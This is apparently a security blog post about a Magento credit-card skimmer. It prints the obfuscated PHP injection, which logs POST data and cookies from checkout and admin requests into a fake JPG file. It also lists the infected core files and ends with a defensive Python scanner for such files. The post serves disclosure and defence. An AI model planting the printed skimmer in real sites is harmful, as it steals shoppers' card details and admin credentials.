
We often see malicious code used to steal credit card details and other sensitive information from compromised Magento sites, but this sample caught our eye because it differs from the others in how the information is collected and stored.

Usually, the attacker sends all the sensitive information via e-mail, but in this case a text file with a "jpg" extension is created to store all the data:

if(preg_match("/".base64_decode('YWRtaW58cGF5bWVudHxvcmRlcnxzYXZlT3JkZXJ8b25lcGFnZXxjaGVja291dA==')."/i", $_SERVER["REQUEST_URI"])){ 
if(!empty($_POST))@file_put_contents(base64_decode('L2Nocm9vdC9ob21lL2RhaWx5Z3JhL2RhaWx5Z3JhYnMuY29tL2h0bWwvbWVkaWEvY2F0YWxvZy9wcm9kdWN0LzIvMS8yMV8xLmpwZw=='), base64_encode( @serialize($_POST)."--".@seralize($_COOKIE) )."\n", FILE_APPEND);

Basically, this code writes the POST data and cookies of every request that contains one of these words in the URL: "admin|payment|order|saveOrder|onepage|checkout" to a file located in "/media/catalog/product/2/1/21_1.jpg".

As you can imagine, at this point the customers' credit card details and the admin's login are available for download.

The data is encoded and serialized inside the file "21_1.jpg", but after reverting these steps you'll see something like this:

[payment] => Array
            [method] => vm
            [cc_type] => VI
            [cc_number] => XXXXX -> indistinct cc number
            [c_exp_month] => 9
            [cc_exp_year] => 2017
            [cc_cid] => 048

Among other data, you'll see admin passwords, customer data and credit card details. It's quite scary to realize that all this information is being stolen and that attackers are continually changing their methods to stay undetected.

This particular code is usually added inside the files "./app/code/core/Mage/Core/functions.php" or "./lib/Varien/Autoload.php", but other files may be affected. We recommend constantly checking the core files for any change and keeping all the software updated. Also, for obvious reasons, it's incredibly important to change the password for all the admin users to avoid re-infections.
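A defender-side check that follows from the storage format described above, added here as an example (not code from the original note): it walks a directory for image-named files that lack JPEG/PNG/GIF magic bytes and flags those whose lines base64-decode to a PHP-serialized array. The function names and the sample record are constructed for illustration.

```python
import base64
import binascii
import os
import re

# Magic bytes of the image formats a Magento media directory normally holds.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")
# PHP serialize() of an array such as $_POST always starts with a:<count>:{
PHP_ARRAY = re.compile(rb"a:\d+:\{")
# Constructed sample record (dummy values), encoded the way the snippet does.
SAMPLE = base64.b64encode(b'a:1:{s:4:"test";s:5:"dummy";}--a:0:{}') + b"\n"


def is_serialized_line(line: bytes) -> bool:
    """True if the line is base64 that decodes to a PHP-serialized array."""
    try:
        decoded = base64.b64decode(line.strip(), validate=True)
    except (binascii.Error, ValueError):
        return False
    return PHP_ARRAY.match(decoded) is not None


def classify(data: bytes) -> str:
    """Return 'image', 'serialized-dump' or 'not-an-image' for file contents."""
    if data.startswith(IMAGE_MAGIC):
        return "image"
    if any(is_serialized_line(ln) for ln in data.splitlines() if ln.strip()):
        return "serialized-dump"
    return "not-an-image"


def scan(root: str) -> dict:
    """Walk root; report every image-named file whose content is not an image."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(IMAGE_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                verdict = classify(fh.read())
            if verdict != "image":
                findings[path] = verdict
    return findings


if __name__ == "__main__":
    print(classify(SAMPLE))  # constructed record, not real data
```

Call `scan()` on the site's media directory; any path it returns should be pulled offline and its contents treated as exposed card and credential data.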

Finally, if you need professional help, you can always count on us.